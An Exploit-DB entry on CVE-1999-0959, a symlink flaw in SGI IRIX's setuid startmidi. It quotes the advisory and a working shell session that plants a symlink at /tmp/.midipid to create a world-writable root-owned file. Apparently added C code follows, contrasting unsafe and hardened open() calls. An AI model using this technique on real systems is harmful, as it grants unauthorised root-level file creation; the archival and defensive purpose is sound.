Exploit SGI IRIX 6.4 - 'startmidi' Local Privilege Escalation

Exploiter

18 Dec 2022
EDB-ID: 19355
EDB verification: Passed
Author: DAVID HEDLEY
Vulnerability type: LOCAL
Platform: IRIX
CVE: CVE-1999-0959
Publication date: 1997-02-09
Code:
source: https://www.securityfocus.com/bid/469/info

A vulnerability exists in the startmidi program from Silicon Graphics. This utility is included with IRIX versions 5.x and 6.x with the Iris Digital Media Execution Environment. startmidi is setuid root and creates a temporary file called /tmp/.midipid. It does not check whether this file already exists or whether it is a symbolic link. As a result, it can be used to create root-owned files, with permissions as set by the user's umask.


% umask 0
% ln -s /blardyblar /tmp/.midipid
% startmidi -d /dev/ttyd1
% ls -l /blardyblar
-rw-rw-rw- 1 root pgrad 0 Feb 9 17:46 /blardyblar
% stopmidi -d /dev/ttyd1
%
 
Source: www.exploit-db.com
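The file-creation flaw described in the advisory, shown as the weak open() pattern beside a hardened one. This is an added example in C, not code from the original post or from SGI; the function names and the demo path in main() are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Weak pattern: O_CREAT without O_EXCL follows an existing symlink and
 * creates or truncates its target; mode 0666 leaves the result to umask. */
int pidfile_create_weak(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened pattern: the name must not exist yet (O_EXCL fails with EEXIST
 * even for a dangling symlink), a link in the final component is refused
 * (O_NOFOLLOW), and the mode is fixed at 0600 instead of 0666. */
int pidfile_create_safe(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Write the PID through the checked descriptor; 0 on success, -1 on error. */
int pidfile_write(const char *path, pid_t pid)
{
    char buf[32];
    int fd = pidfile_create_safe(path);
    if (fd < 0)
        return -1;
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)pid);
    int ok = (write(fd, buf, (size_t)n) == n);
    return (close(fd) == 0 && ok) ? 0 : -1;
}

int main(void)
{
    /* Demo path is an assumption, not the file startmidi uses. */
    const char *p = "/tmp/example.midipid";
    if (pidfile_write(p, getpid()) != 0)
        perror(p);   /* reports EEXIST if the name is already taken */
    return 0;
}
```

A privileged daemon is better served by a PID file in a directory only root can write to, so that no other user can pre-create the name at all.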
